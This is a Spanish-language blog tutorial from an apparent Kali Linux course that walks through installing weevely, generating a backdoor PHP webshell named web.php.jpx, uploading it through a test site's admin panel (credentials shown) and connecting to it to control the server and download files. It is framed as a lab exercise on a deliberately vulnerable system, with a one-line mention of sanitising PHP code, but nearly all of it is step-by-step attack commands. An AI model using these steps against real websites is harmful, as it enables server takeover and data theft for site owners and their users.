Categorías: [Curso] Kali Linux

Backdoor Webshell con weevely en Kali Linux

Introducción

En este manual vamos a analizar la forma en la que usuarios malintencionados pueden llegar a tomar control de nuestros sistemas web (paginas web). Para evitar que lleguen a colocarnos archivos archivos maliciosos en nuestro sistema debemos de sanitisar nuestro código con las medidas de seguridad que el mismo php recomienda
Recordemos que para hacer nuestras pruebas debemos tener un sistema de pruebas con vulnerabilidades lo cual lo podemos instalar siguiendo este manual.

Instalación

En los siguientes sencillos 3 pasos podemos iniciar nuestra pruebas con weevely:
1.- Instalamos PySocks la cual nos ayudara a iniciar la conexión entre nustra maquina y la pagina victima.
git clone https://github.com/Anorov/PySocks.git
cd PySocks
python setup.py install
Nos salimos de la carpeta
cd ..
2.- Ahora usaremos weevely que creara un archivo tunel entre nuestro kali y la pagina victima
Descargamos y entramos a weevely
git clone https://github.com/epinna/weevely3.git
cd weevely3
Creamos un archivo tunel llamado web.php.jpx
python weevely.py generate hacked /root/Escritorio/web.php.jpx
Donde:
/root/Escritorio/ : es la carpeta donde colocaremos nuestro archivo
En caso de que el comando anterior de errores quizás falta instalar dependencias como se muestra aqui
3.- Subimos el archivo web.php.jpx a la pagina victima
En mi caso:
http://192.168.8.103/admin/
User: admin
Password: P4ssw0rd
Nos conectamos al archivo desde nuestra maquina local
python weevely.py http://192.168.8.103/admin/uploads/web.php.jpx hacked
Ya estamos en la maquina de la pagina victima y podemos hacer lo que querramos por ejemplo descargar un archivo.
:file_download /var/www/admin/uploads/hacker.png /root/Escritorio/hacker.png

Eugenio Chaparro

Compartir
Publicado por
Eugenio Chaparro

Entradas recientes

🟢Editar código de un módulo en Dolibarr [04]

🟢Editar código de un módulo en Dolibarr [04]

En este tutorial vamos editar el código de nuestro módulo personas para poder personalizar algunas…

2 meses hace
🟢Crear un sub_módulo en Dolibarr [03]

🟢Crear un sub_módulo en Dolibarr [03]

En este tutorial vamos a crear un sub módulo llamado seguridad que será muy parecido…

2 meses hace
🟢Modificar un módulo en Dolibarr [02]

🟢Modificar un módulo en Dolibarr [02]

En este tutorial aprenderemos a editar el objeto personas del modulo persona que creamos en…

2 meses hace
🟢Constructor de módulos en Dolibarr

🟢Constructor de módulos en Dolibarr

Como mencionamos anteriormente Dolibarr es un proyecto realizado sobre la base de una política clara:…

2 meses hace
🟢Tickets en Dolibarr [19]

🟢Tickets en Dolibarr [19]

Los ticket en dolibarr nos ayudan a comunicar inconveniente en nuestros productos y servicios dentro…

2 meses hace
🟢Agenda en Dolibarr [18]

🟢Agenda en Dolibarr [18]

Las agendas en dolibarr nos ayudan a ver las actividades realizadas en proceso y por…

2 meses hace